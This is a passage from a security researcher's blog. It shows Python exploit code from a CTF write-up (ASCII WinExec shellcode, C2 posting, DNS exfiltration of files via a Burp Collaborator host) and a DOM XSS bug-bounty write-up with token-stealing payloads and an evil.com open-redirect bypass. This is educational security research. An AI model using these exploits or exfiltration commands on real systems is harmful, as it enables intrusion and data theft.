                target_bytes = rev_hex_payload[(rev_hex_payload_len - (rev_hex_payload_len%8)):]
                first_instructions.append(f"mov al, 0x{target_bytes[4:6]};")
                first_instructions.append("push eax;")
                first_instructions.append(f"mov ax, 0x{target_bytes[2:4] + target_bytes[0:2]};")
                first_instructions.append("push ax;")
            null_terminated = True
            
    instructions = first_instructions + instructions
    asm_instructions = "".join(instructions)
    return asm_instructions


def ascii_shellcode(command):
    if len(command) > 76:
        print("[-] Command is too long!")
        exit(1)
    padded_command = command + " " * (76 - len(command)) # amount of padding available
    asm = [
        # at start, eax, esi, edi are nulled
        "   start:",
        "       pop     edx;",
        "       pop     edx;",                                  # Pointer to shellcode in edx
        "       xor     al, 0x7f;",                             # inc eax to 0x80 which xors out the ones that are out of reach
        "       inc     eax;",
        "       xor     dword ptr [edx+0x6e], eax;",            # correct ff d7 call   edi
        "       xor     dword ptr [edx+0x6f], eax;",            # correct ff d7 call   edi
        "       push    0x7f;",                                 # dont need ebx, use eax
        "       pop     ebx;",
        "       xor     dword ptr [edx+ebx+0x24], eax;",        # correct ad lods eax,dword ptr ds:[esi]
        "       xor     dword ptr [edx+ebx+0x29], eax;",        # correct 75 ed jne    0x68
        "       push    0x7f;",
        "       add     ebx, dword ptr [esp];",
        "       xor     dword ptr [edx+ebx+0x27], eax;",        # correct ff d7 call   edi 
        "       xor     dword ptr [edx+ebx+0x28], eax;",        # correct ff d7 call   edi
        "       xor     dword ptr [edx+ebx+0x7f], eax;",        # correct ff d7 call   edi
        "       xor     dword ptr [edx+ebx+0x7f], eax;",        # correct ff d7 call   edi
        "       push    0x53736046;",                           # 60 should xor with 80 to get e0
        "       pop     ebx;",                                  # IAT address pointer to GetModuleHandle in ebx
        "       push 0x01014001;",
        "       add ebx, dword ptr [esp];",
        "       add ebx, dword ptr [esp];",
        "       push    0x01010101;",                           # use eax to xor for null bytes in wide string and invalid chars in GetModuleHandle address pointer
        "       pop     eax;",                                  # use eax to xor for null bytes in wide string
        "       xor     edi, dword ptr [ebx];",                 # dereference IAT, get GetModuleHandle in edi       
        "       push    esi;",                                  # nulls for end of wide string
        "       push    0x01330132;",                           # push widestring "kernel32"
        "       xor     dword ptr [esp], eax;",
        "       push    0x016d0164;",                   
        "       xor     dword ptr [esp], eax;",
        "       push    0x016f0173;",                   
        "       xor     dword ptr [esp], eax;",
        "       push    0x0164016a;",                   
        "       xor     dword ptr [esp], eax;",
        "       push    esp;",
        "       call    edi;",                                  # call GetModuleHandleW(&"kernel32")
        "       push    eax;",                                  # Kernel32 base address in eax
        "       pop     edi;",
        "       push    esi;",                                  # null bytes
        "       pop     ebx;",
        "       xor     ebx, dword ptr [edi + 0x3C];",          # ebx = [kernel32 + 0x3C] = offset(PE header)
        "       push    ebx;",                                  # null out bytes on top of stack
        "       xor     ebx, dword ptr [esp];",
        "       pop     eax;",
        "       xor     ebx, dword ptr [edi + eax + 0x78];",    # ebx = [PE32 optional header + offset(PE32 export table offset)] = offset(export table)
        "       xor     esi, dword ptr [edi + ebx + 0x20];",    # esi = [kernel32 + offset(export table) + 0x20] = offset(names table)
        "       push    edi;",
        "       add     esi, dword ptr [esp];",                 # esi = kernel32 + offset(names table) = &(names table)
        "       xor     dword ptr [esp], edi;",                 # null out value on stack
        "       pop     edx             ;",         
        "       xor     edx, [edi + ebx + 0x24];",              # edx = [kernel32 + offset(export table) + 0x24] = offset(ordinals table)
        push_string("WinE"),
        "       pop ecx;",                                      # ecx = 'WinE'
        "   find_winexec_x86:"
        "       push    ebp;",
        "       xor     dword ptr [esp], ebp;",                 # null out bytes on top of stack
        "       and     ebp, dword ptr [esp];",                 # nulls out ebp for xor operation
        "       xor     BP, WORD ptr [edi + edx];",             # ebp = [kernel32 + offset(ordinals table) + offset] = function ordinal
        "       inc     edx;",
        "       inc     edx;",                                  # edx = offset += 2
        "       lodsd;",                                        # eax = &(names table[function number]) = offset(function name)
        "       cmp     [edi + eax], ecx;"                      # *(dword*)(function name) == "WinE" ?
        "       jne     find_winexec_x86;",
        "       pop     esi;",
        "       xor     esi, dword ptr [edi + ebx + 0x1C];"     # esi = [kernel32 + offset(export table) + 0x1C] = offset(address table)] = offset(address table)
        "       push    edi;",
        "       add     esi, dword ptr [esp];",                 # esi = kernel32 + offset(address table) = &(address table)
        "       push    ebp;",
        "       add     ebp, dword ptr [esp];",
        "       add     edi, [esi + ebp * 2];",                 # edi = kernel32 + [&(address table)[WinExec ordinal]] = offset(WinExec) = &(WinExec)
        "       push    0x31;",                                 # null out eax
        "       pop     eax;",
        "       xor     al, 0x31;",
        "       push    eax;",                                  # nulls
        push_string(padded_command),                            # set up args for WinExec
        "       push    esp;",
        "       pop     ebx;",
        "       inc     eax;",
        "       push    eax;",
        "       push    ebx;",
        "       inc     ecx;",                                  # NOP
        "       inc     ecx;",                                  # NOP
        "       call    edi;",                                  # WinExec(&("calc"), 1);
    ]
    return "\n".join(asm)

## o2r7vffpq263v6rrjsyxq4xp7gd61v.burpcollaborator.net
COLLABORATOR_INSTANCE = "o2r7vffpq263v6rrjsyxq4xp7gd61v"
FILE_NAME = "1_run_uwu1.bat"
BANNED_CHARS = ['%', '&', '+']
C2_URL = 'http://<IP ADDRESS>:18080/send.php'
TARGET_UWUID = '715cf1a6-51de-4a55-be11-c0ffeec0ffee'
WORKING_FILE = 'l'


def send_command(command):
    for banned_char in BANNED_CHARS:
        if banned_char in command:
            print("Banned chars detected in command!")
            exit(1)

    print("[+] Sending command: {}".format(command))

    shellcode = ascii_shellcode(command)
    eng = ks.Ks(ks.KS_ARCH_X86, ks.KS_MODE_32)
    encoding, _ = eng.asm(shellcode)
    payload_string = ""
    payload = b'UwU' 
    payload += b'A' * 29 
    payload += pack("<L", (0x41410679)) + pack("<L", (0x55756e78)) 
    payload += bytes(encoding) 
    payload += b"A" * (328 - len(payload))
    payload = payload.replace(b'\xff\xd7', b'\x7f\x57').replace(b'\x8b', b'\x0b').replace(b'\xfe', b'\x7e').replace(b'\xb7', b'\x37').replace(b'\xad', b'\x2d').replace(b'\xee', b'\x6e').replace(b'\xae', b'\x2e').replace(b'\xed', b'\x6d')
    for enc in payload:
        payload_string += "%{0:02x}".format(enc)

    payload_string = payload_string.replace("%ff%d7", "%7f%57").replace("%8b","%0b").replace("%fe","%7e").replace("%b7","%37").replace("%ad","%2d").replace("%ee","%6e").replace("%ae","%2e").replace("%ed", "%6d")

    headers = {
        'User-Agent': 'UwUserAgent/1.0'
    }

    requests.post(C2_URL, headers=headers, data={'action': 'send', 'a': '715cf1a6-51de-4a55-be11-c0ffeec0ffee', 'b': payload})
    sleep(5)

def exfil_working_file():
    send_command("powershell Add-Content {} .{}. -NoNewLine".format(WORKING_FILE, COLLABORATOR_INSTANCE))
    send_command("powershell Add-Content {} burpcollaborator.net -NoNewLine".format(WORKING_FILE))
    send_command("powershell ping $(type {})".format(WORKING_FILE))
    delete_file(WORKING_FILE)

def delete_file(filename):
    send_command('powershell del {}'.format(filename))
    
def get_file_length(filename):
    send_command("powershell \"Add-Content {} $(Get-Content {}).length -NoNewLine\"".format(WORKING_FILE, filename))
    exfil_working_file()

def exfil_file(filename):
    base64_file = "e"
    block_size = 50

    # delete base64 file
    delete_file(base64_file)

    # create base64 file
    send_command("certutil -encodehex -f {} {} 0x40000001".format(filename, base64_file))

    # get base64 file length
    get_file_length(base64_file)
    file_length = int(input("[*] Enter received base64 file length: "))

    # replace non-DNS compliant chars
    send_command("powershell \"(Get-Content {}).replace([char]43, '-') | Set-Content {}\"".format(base64_file, base64_file))
    send_command("powershell \"(Get-Content {}).replace('/', '.') | Set-Content {}\"".format(base64_file, base64_file))
    send_command("powershell \"(Get-Content {}).replace('=', '') | Set-Content {}\"".format(base64_file, base64_file))

    offset = 0
    while offset < file_length:
        print("[+] Exfiltrating offset {} in file {}".format(offset, filename))
        # Add offset at front and back to prevent .. error and also to ensure that all blocks are received
        send_command("powershell \"Add-Content {} {} -NoNewLine\"".format(WORKING_FILE, offset))
        if (offset + block_size) > file_length:
            send_command("powershell \"Add-Content {} $(Get-Content {}).substring({},{}) -NoNewLine\"".format(WORKING_FILE, base64_file, offset, file_length - offset - 1))
        else:
            send_command("powershell \"Add-Content {} $(Get-Content {}).substring({},{}) -NoNewLine\"".format(WORKING_FILE, base64_file, offset, block_size))
        send_command("powershell \"Add-Content {} {} -NoNewLine\"".format(WORKING_FILE, offset))
        offset += block_size

        exfil_working_file()

## if any blocks were dropped previously
def exfil_lost_block(filename, offset, length):
    print("[+] Exfiltrating offset {} in file {}".format(offset, filename))
    send_command("powershell \"Add-Content {} {} -NoNewLine\"".format(WORKING_FILE, offset))
    send_command("powershell \"Add-Content {} $(Get-Content {}).substring({},{}) -NoNewLine\"".format(WORKING_FILE, filename, offset, length))
    send_command("powershell \"Add-Content {} {} -NoNewLine\"".format(WORKING_FILE, offset))
    exfil_working_file()

## MicrosoftWindowsVersion10.0.14393
def get_version():
    version_file = 'v'
    send_command("cmd /c \"ver > {}\"".format(version_file))
    send_command("powershell \"(Get-Content {}).replace(' ', '') | Set-Content {}\"".format(version_file, version_file))
    send_command("powershell \"(Get-Content {}).replace('[', '') | Set-Content {}\"".format(version_file, version_file))
    send_command("powershell \"(Get-Content {}).replace(']', '') | Set-Content {}\"".format(version_file, version_file))
    send_command("powershell \"(Get-Content {})[1] | Set-Content {} -NoNewLine\"".format(version_file, version_file))
    send_command("powershell \"Add-Content {} $(Get-Content {}) -NoNewLine\"".format(WORKING_FILE, version_file))
    exfil_working_file()

## ec2amaz-9ri345e\administrator
def get_user():
    user_file = 'v'
    send_command("cmd /c \"whoami > {}\"".format(user_file))
    send_command("powershell \"(Get-Content {}).replace('\\', '') | Set-Content {} -NoNewLine\"".format(user_file, user_file))
    send_command("powershell \"Add-Content {} $(Get-Content {}) -NoNewLine\"".format(WORKING_FILE, user_file))
    exfil_working_file()

## C:\Users\Administrator\AppData\LocalLow
def get_pwd():
    send_command("cmd /c \"cd > {}\"".format(WORKING_FILE))
    send_command("powershell \"(Get-Content {}).replace(':', '-') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
    send_command("powershell \"(Get-Content {}).replace('\\', '-') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
    send_command("powershell \"(Get-Content {}).replace(' ', '.') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
    exfil_working_file()

## Microsoft
## Temp
## 1_run_uwu1.bat
def get_file_name(index):
    send_command("powershell \"Add-Content {} $(ls)[{}].Name -NoNewLine\"".format(WORKING_FILE, index))
    send_command("powershell \"(Get-Content {}).replace('_', '-') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
    exfil_working_file()
    

def exfil_final_uwu():
    delete_file("c")
    delete_file("x")
    delete_file("y")
    send_command("cmd /c \"echo ^4 > c\"")
    send_command("cmd /c \"echo ^5 >> c\"")
    send_command("cmd /c \"type c | cmd /c final_uwu_with_flag.exe > x\"")
    sleep(3)        # more time to play UwU sound
    send_command("powershell \"Select-String -Path x -Pattern TISC|Out-File y\"")       # save more time
    exfil_file("y")

if __name__ == "__main__":
    delete_file(WORKING_FILE)
    # get_user()
    # get_pwd()
    # get_file_name(2)
    # exfil_file('1_run_uwu1.bat')
    # exfil_lost_block('e', 120, 30)
    # exfil_lost_block('e', 330, 13)
    # exfil_lost_block('y', 25, 25)
    exfil_final_uwu()   

Interestingly, this turned out to be an unintended solution as I was meant to rely purely on the shellcode to transmit the flag via the UwU.exe messaging functions. I had considered this route earlier but decided that it would be too troublesome to set up the call stack. Fortunately, life found a way.

TISC{UwU_m@lwArez_4_uWuuUU!}

Conclusion

After two weeks of intense puzzle solving, I finished all 10 levels, claiming $25,000 for charity as one other participant had completed level 8. CSIT kindly donated the prize money to The Community Chest on my behalf. I got lots of practice exploiting a broad range of targets and crafted my own ASCII-only Windows WinExec shellcode that could be reused for future exploits. It was a trial by fire that gave me more confidence to tackle new CTF domains such as steganography, forensics, and pwn. Many of the later challenges featured twists that forced me to β€œtry harder” beyond existing writeups and conduct my own original research. If I could award prizes to challenges, they would be:

  1. Most Hardcore: Malware for UwU
  2. Best Storyline: 1865 Text Adventure
  3. Biggest Headache: Get-Shwifty
  4. Most Dynamic: The Secret
  5. Biggest Haystack: Knock Knock, Who’s There
  6. Smallest Needle: Need for Speed
  7. Smallest Payload: The Magician's Den
  8. Most Likely to Make Me Guess: Needle in a Greystack
  9. Most Enraging: Dee Na Saw as a need
  10. Most Parts: Scratching the Surface

Thank you TISC organising team for a great challenge!

Results

2Q21: New Year's Reflections

31 December 2021 at 10:24

This may be the most important proposition revealed by history: β€œAt the time, no one knew what was coming.”

― Haruki Murakami, 1Q84

1Q84 sat on my shelf gathering dust for years after I bought it during a wildly-ambitious Amazon shopping spree. I promised myself that I would get round to reading it, but college offered far more immediate distractions.

I only started reading it in 2020, when a new phase of life – my first job! – triggered a burst of enthusiasm for fresh beginnings. I moved at a brisk pace, savouring Murakami’s knack for magical prose and weird similes (β€œHis voice was hard and dry, reminding her of a desert plant that could survive a whole year on one day’s worth of rain.”) However, as a mysterious new virus crept, then leapt across the globe, I found myself slowing down. The fantastical plot filled with Little People and Air Chrysalises and two moons began to take on a degree of verisimilitude that pulled me out of the story.

Two-thirds into the book, one of the characters, a woman/fitness instructor/assassin named Aomame, isolates herself in a small apartment for months due to reasons outside of her control. Unable to even take a single step outside, she kills time by reading Proust (In Search of Lost Time), listening to the radio, and working out. She’s lost, trying to find her way back to a sense of normalcy. It felt too real; although I only had about a hundred pages left, I put the book back on the shelf.

The most-read New York Times story in 2021 labelled the pervasive sense of ennui as β€œlanguishing” – the indeterminable void between depression and flourishing. To combat this, it suggested rediscovering one’s β€œflow”.

I set three big learning goals for myself this year: artificial intelligence, vulnerability research, and Internet of Things.

I was lucky enough to snag a OpenAI’s GPT-3 beta invitation, and the tinkering that ensued eventually resulted in AI-powered phishing research that I presented with my colleagues at DEF CON and Black Hat USA. WIRED magazine covered the project in thankfully fairly nuanced terms.

In the meantime, I cut my teeth on basic exploitation with Offensive Security’s Exploit Developer course, which I then applied to my research to discover fresh Apache OpenOffice and Microsoft Office code execution bugs (The Register reported on my related HacktivityCon talk). Dipping my toes into the vulnerability research reminded me just how vast this ocean is; it’ll be a long time before I can even tread water.

Finally, I trained with my colleagues in beginner IoT/OT concepts, winning the DEF CON ICS CTF. One thing I noticed about this space is the lack of good online trainings (even the in-person ones are iffy); there’s a niche market opportunity here. My vulnerability research team discovered 8 new vulnerabilities in Synology’s Network Attached Storage devices in a (failed) bid for Pwn2Own glory. Still, I made some lemonade with an upcoming talk at ShmooCon on why no one pwned Synology at Pwn2Own and TianFu Cup. Spoiler: it’s not because Synology is unhackable.

I finished 1Q84 last week. At the end of the book, Aomame escapes the dangerous alternate dimension she’s trapped in by entering yet another dimension – sadly, there’s no way home, as Spiderman will tell you. I suspect that β€œsame same but different” feeling will carry over to 2022 – even as we emerge from the great crisis, there will be no homecoming. We will have to deal with the strange new world we have stumbled into.

Whichever dimension we may be in, here’s wishing you and your loved ones a very happy new year.

Solving DOM XSS Puzzles

3 February 2022 at 00:05

DOM-based Cross-site scripting (XSS) vulnerabilities rank as one of my favourite vulnerabilities to exploit. It's a bit like solving a puzzle; sometimes you get a corner piece like $.html(), other times you have to rely on trial-and-error. I recently encountered two interesting postMessage DOM XSS vulnerabilities in bug bounty programs that scratched my puzzle-solving itch.

Note: Some details have been anonymized.

Puzzle A: The Postman Problem

postMessage emerged in recent years as a common source of XSS bugs. As developers moved to client-side JavaScript frameworks, classic server-side rendered XSS vulnerabilities disappeared. Instead, frontends used asynchronous communication streams such as postMessage and WebSockets to dynamically modify content.

I keep an eye out for postMessage calls with Frans RosΓ©n's postmessage-tracker tool. It's a Chrome extension that helpfully alerts you whenever it detects a postMessage call and enumerates the path from source to sink. However, while postMessage calls abound, most tend to be false positives and require manual validation.

While browsing Company A’s website at https://feedback.companyA.com/, postmessage-tracker notified me of a particularly interesting call originating from an iFrame https://abc.cloudfront.net/iframe_chat.html:

window.addEventListener("message", function(e) {
...
    } else if (e.data.type =='ChatSettings') {
         if (e.data.iframeChatSettings) {
             window.settingsSync =  e.data.iframeChatSettings;
...

The postMessage handler checked if the message data (e.data) contained a type value matching ChatSettings. If so, it set window.settingsSync to e.data.iframeChatSettings. It did not perform any origin checks – always a good sign for bug hunters since the message could be sent from any attacker-controled domain.

What was window.settingsSync used for? By searching for this string in Burp, I discovered https://abc.cloudfront.net/third-party.js:

else if(window.settingsSync.environment == "production"){
  var region = window.settingsSync.region;
  var subdomain = region.split("_")[1]+'-'+region.split("_")[0]
  domain = 'https://'+subdomain+'.settingsSync.com'
}
var url = domain+'/public/ext_data'

request.open('POST', url, true);
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.onload = function () {
  if (request.status == 200) {
    var data = JSON.parse(this.response);
...
    window.settingsSync = data;
...
    var newScript = 'https://abc.cloudfront.net/module-v'+window.settingsSync.versionNumber+'.js';
    loadScript(document, newScript);

If window.settingsSync.environment == "production”, window.settingsSync.region would be rearranged into subdomain and inserted into domain = 'https://'+subdomain+'.settingsSync.com. This URL would then be used in a POST request. The response would be parsed as a JSON and set window.settingsSync. Next, window.settingsSync.versionNumber was used to construct a URL that loaded a new JavaScript file var newScript = 'https://abc.cloudfront.net/module-v'+window.settingsSync.versionNumber+'.js'.

In a typical scenario, the page would load https://abc.cloudfront.net/module-v2.js:

config = window.settingsSync.config;
…
eval("window.settingsSync.configs."+config)

Aha! eval was a simple sink that executed its string argument as JavaScript. If I controlled config, I could execute arbitrary JavaScript!

However, how could I manipulate domain to match my malicious server instead of *.settingsSync.com? I inspected the code again:

  var region = window.settingsSync.region;
  var subdomain = region.split("_")[1]+'-'+region.split("_")[0]
  domain = 'https://'+subdomain+'.settingsSync.com'

I noticed that due to insufficient sanitisation and simple concatenation, a window.settingsSync.region value like .my.website/malicious.php?_bad would be rearranged into https://bad-.my.website/malicious.php?.settingsSync.com! Now domain pointed to bad-.my.website, a valid attacker-controlled domain served a malicious payload to the POST request.

Diagram 1

I created malicious.php on my server to send a valid response by capturing the responses from the origin target. I modified the name of the selected config to my XSS payload:

<?php
$origin = $_SERVER['HTTP_ORIGIN'];
header('Access-Control-Allow-Origin: ' . $origin);
header('Access-Control-Allow-Headers: cache-control');
header("Content-Type: application/json; charset=UTF-8");

echo '{
    "versionNumber": "2",
    "config": β€œa;alert()//β€œ,
    "configs": {
        "a": "a"
    }
    ...
}'
?>

Based on this response, the sink would now execute:

eval("window.settingsSync.configs.a;alert()//”)

From my own domain, I spawned the page containing the vulnerable iFrame with var child = window.open("https://feedback.companyA.com/"), then sent the PostMessage payload with child.frames[1].postMessage(...). With that, the alert box popped!

However, I still needed one final piece. Since the XSS executed in the context of an iFrame https://abc.cloudfront.net/iframe_chat.html instead of https://feedback.companyA.com/, there was no actual impact; it was as good as executing XSS on an external domain. I needed to somehow leverage this XSS in the iFrame to reach the parent window https://feedback.companyA.com/.

Thankfully, https://feedback.companyA.com/ included yet another interesting postMessage handler:

    }, d = document.getElementById("iframeChat"), window.addEventListener("message", function(m) {
        var e;
        "https://abc.cloudfront.net" === m.origin && ("IframeLoaded" == m.data.type && d.contentWindow.postMessage({
            type: "credentialConfig",
            credentialConfig: credentialConfig
        }, "*"))

https://feedback.companyA.com/ created a PostMessage listener that validated the message origin as https://abc.cloudfront.net. If the message data type was IframeLoaded, it sent a PostMessage back with credentialConfig data.

credentialConfig included a session token:

{
    "region": "en-uk",
    "environment": "production",
    "userId": "<USERID>",
    "sessionToken": "Bearer <SESSIONTOKEN>"
}

Thus, by sending the PostMessage to trigger an XSS on https://abc.cloudfront.net/iframe_chat.html, the XSS would then run arbitrary JavaScript that sent another PostMessage from https://abc.cloudfront.net/iframe_chat.html to https://feedback.companyA.com/ which would leak the session token.

Based on this, I modified the XSS payload:

{
    "versionNumber": "2",
    "config": "a;window.addEventListener(`message`, (event) => {alert(JSON.stringify(event.data))});parent.postMessage({type:`IframeLoaded`},`*`)//",
    "configs": {
        "a": "a
    }
}

The XSS received the session data from the parent iFrame on https://feedback.companyA.com/ and exfiltrated the stolen sessionToken to an attacker-controlled server (I simply used alert here).

Puzzle B: Bypassing CSP with Newline Open Redirect

While exploring the OAuth flow of Company B, I noticed something strange about its OAuth authorization page. Typically, OAuth authorization pages present some kind of confirmation button to link an account. For example, here's Twitter's OAuth authorization page to login to GitLab:

OAuth Login

Company B's page used a URL with the following format: https://accept.companyb/confirmation?domain=oauth.companyb.com&state=<STATE>&client=<CLIENT ID>. Once the page was loaded, it would dynamically send a GET request to oauth.companyb.com/oauth_data?clientID=<CLIENT ID>. This returned some data to populate the page's contents:

{
    "app": {
        "logoUrl": <PAGE LOGO URL>,
        "name": <NAME>,
        "link": <URL> ,
        "introduction": "A cool app!"
        ...
    }
}

By playing around with this response data, I realised that introduction was injected into the page without any sanitisation. If I could control the destination of the GET request and subsequently the response, it would be possible to cause an XSS.

Fortunately, it appeared that the domain parameter allowed me to control the domain of the GET request. However, when I set this to my own domain, the request failed to execute and raised a Content Security Policy (CSP) error. I quickly checked the CSP of the page:

Content-Security-Policy: default-src 'self' 'unsafe-inline' *.companyb.com *.amazonaws.com; script-src 'self' https: *.companyb.com; object-src 'none';

When dynamic HTTP requests are made, they adhere to the connect-src CSP rule. In this case, the default-src rule meant that only requests to *.companyb.com and *.amazonaws.com were allowed. Unfortunately for the company, *.amazonaws.com created a big loophole: since AWS S3 files are hosted on *.s3.amazonaws.com, I could still send requests to my attacker-controlled bucket! Furthermore, CORS would not be an issue as AWS allows users to set the CORS policies of buckets.

I quickly hosted a JSON file with text as <script>alert()</script> on https://myevilbucket.s3.amazonaws.com/oauth_data.json, then browsed to https://accept.companyb/confirmation?domain=myevilbucket.s3.amazonaws.com%2f payload.json%3F&state=<STATE>&client=<CLIENT ID>. The page successfully requested my file at https://myevilbucket.s3.amazonaws.com/payload.json?/oauth_data?clientID=<CLIENT ID>, then... nothing.

One more problem remained: the CSP for script-src only allowed for self or *.companyb.com for HTTPS. Luckily, I had an open redirect on t.companyb.com saved for such situations. The vulnerable endpoint would redirect to the value of the url parameter but validate if the parameter ended in companyb.com. However, it allowed a newline character %0A in the subdomain section, which would be truncated by browsers such that http://t.companyb.com/redirect?url=http%3A%2F%2Fevil.com%0A.companyb.com%2F actually redirected to https://evil.com/%0A.companyb.com/ instead.

By using this bypass to create an open redirect, I saved my final XSS payload in <NEWLINE CHARACTER>.companyb.com in my web server's document root. I then injected a script tag with src pointing to the open redirect which passed the CSP but eventually redirected to the final payload.

Diagram 2

Conclusion

Both companies awarded bonuses for my XSS reports due to their complexity and ability to bypass hardened execution environments. I hope that by documenting my thought processes, you can also gain a few extra tips to solve DOM XSS puzzles.

From checkra1n to Frida: iOS App Pentesting Quickstart on iOS 13

15 December 2019 at 15:41
I wanted to get into mobile app pentesting. While it’s relatively easy to get started on Android, it’s harder to do so with iOS. For example, while Android has Android Virtual Device and a host of other third-party emulators, iOS only has a Xcode’s iOS Simulator, which mimics the software environment of an iPhone and not the hardware. As such, iOS app pentesting requires an actual OS device.

Low-Hanging Apples: Hunting Credentials and Secrets in iOS Apps

29 December 2019 at 14:58
Diving straight into reverse-engineering iOS apps can be daunting and time-consuming. While wading into the binary can pay off greatly in the long run, it’s also useful to start off with the easy wins, especially when you have limited time and resources. One such easy win is hunting login credentials and API keys in iOS applications.

Remote Code Execution in Three Acts: Chaining Exposed Actuators and H2 Database Aliases in Spring Boot 2

12 January 2020 at 23:15
The Spring Boot framework is one of the most popular Java-based microservice frameworks that helps developers quickly and easily deploy Java applications. With its focus on developer-friendly tools and configurations, Spring Boot accelerates the development process. However, these development defaults can become dangerous in the hands of inexperienced developers.

A Tale of Two Formats: Exploiting Insecure XML and ZIP File Parsers to Create a Web Shell

18 February 2020 at 06:02
While researching a bug bounty target, I came across a web application that processed a custom file type which was actually just a ZIP file that contains an XML that functions as a manifest. If handled naively, this packaging pattern creates additional security issues. These β€œvulnerabilities” are actually features built into the XML and ZIP formats. Responsibility falls onto XML and ZIP parsers to handle these features safely. Unfortunately, this rarely happens, especially when developers simply use the default settings.

Same Same But Different: Discovering SQL Injections Incrementally with Isomorphic SQL Statements

5 April 2020 at 09:04
Despite the increased adoption of Object-Relational Mapping (ORM) libraries and prepared SQL statements, SQL injections continue to turn up in modern applications. In real-world scenarios, researchers need to balance two concerns when searching for SQL injections - 1. Ability to execute injections in multiple contexts; and 2. Ability to bypass WAFs and sanitization steps. A researcher can resolve this efficiently with something I call Isomorphic SQL Statements.

Closing the Loop: Practical Attacks and Defences for GraphQL APIs

15 May 2020 at 13:37
While GraphQL promised greater flexibility and power over traditional REST APIs, GraphQL could potentially increase the attack surface for access control vulnerabilities. Developers should look out for these issues when implementing GraphQL APIs and rely on secure defaults in production. At the same time, security researchers should pay attention to these weak spots when testing GraphQL APIs for vulnerabilities.

Imposter Alert: Extracting and Reversing Metasploit Payloads (Flare-On 2020 Challenge 7)

3 December 2020 at 13:04
I recently participated in FireEye’s seventh annual Flare-On Challenge, a reverse engineering and malware analysis Capture The Flag (CTF) competition. Out of the 11 challenges ranging from typical executables to games written in exotic programming languages, I liked Challenge 7 the best.

Supply Chain Pollution: Hunting a 16 Million Download/Week npm Package Vulnerability for a CTF Challenge

23 December 2020 at 15:29
GovTech’s Cyber Security Group recently organised the STACK the Flags Cybersecurity Capture-the-Flag (CTF) competition from 4th to 6th December 2020. For the web domain, my team wanted to build challenges that addressed real-world issues we have encountered during penetration testing of government web applications and commercial off-the-shelf products.

Applying Offensive Reverse Engineering to Facebook Gameroom

2 February 2021 at 17:03
Late last year, I was invited to Facebook’s Bountycon event, which is an invitation-only application security conference with a live-hacking segment. Although participants could submit vulnerabilities for any Facebook asset, Facebook invited us to focus on Facebook Gaming. Having previously tested Facebook’s assets, I knew it was going to be a tough challenge.

ROP and Roll: EXP-301 Offensive Security Exploit Developer (OSED) Review and Exam

23 June 2021 at 15:21
After clearing the OSEP at the end of February 2021, I took the 60-day EXP-301/OSED package from March to May 2021, and finally cleared the exam in mid-June. At the time of writing, this costs $1299. As my job role is pretty multi-disciplinary, I found it necessary to build up my exploit development skills and the OSED came at a right time.

Down the Rabbit Hole: Unusual Applications of OpenAI in Cybersecurity Tooling

17 September 2021 at 13:16
Most research into the malicious applications of AI tends to focus on human factors (scamming, phishing, disinformation). There has been some discussion of AI-powered malware but this remains very much in the proof-of-concept stage. This is partly a function of the kinds of models available to researchers - generative models lend themselves easily to synthetic media, while language models are easily applied to phishing and fake news. But where do we go from these low-hanging fruits?

All Your (d)Base Are Belong To Us, Part 1: Code Execution in Apache OpenOffice (CVE-2021-33035)

29 September 2021 at 03:35
This two-part series will share how I got started in vulnerability research by discovering and exploiting code execution zero-days in office applications used by hundreds of millions of people. I will outline my approach to getting started in vulnerability research including dumb fuzzing, coverage-guided fuzzing, reverse engineering, and source code review. I will also discuss some management aspects of vulnerability research such as CVE assignment and responsible disclosure.

All Your (d)Base Are Belong To Us, Part 2: Code Execution in Microsoft Office (CVE-2021-38646)

22 October 2021 at 11:43
By searching for DBF-related vulnerabilities in Microsoft’s desktop database engines, I took one step towards the deep end of the fuzzing pool. I could no longer rely on source code review and dumb fuzzing; this time, I applied black-box coverage-based fuzzing with a dash of reverse engineering. My colleague Hui Yi has written several fantastic articles on fuzzing with WinAFL and DynamoRIO; I hope this article provides a practical application of those techniques to real vulnerabilities.
❌
❌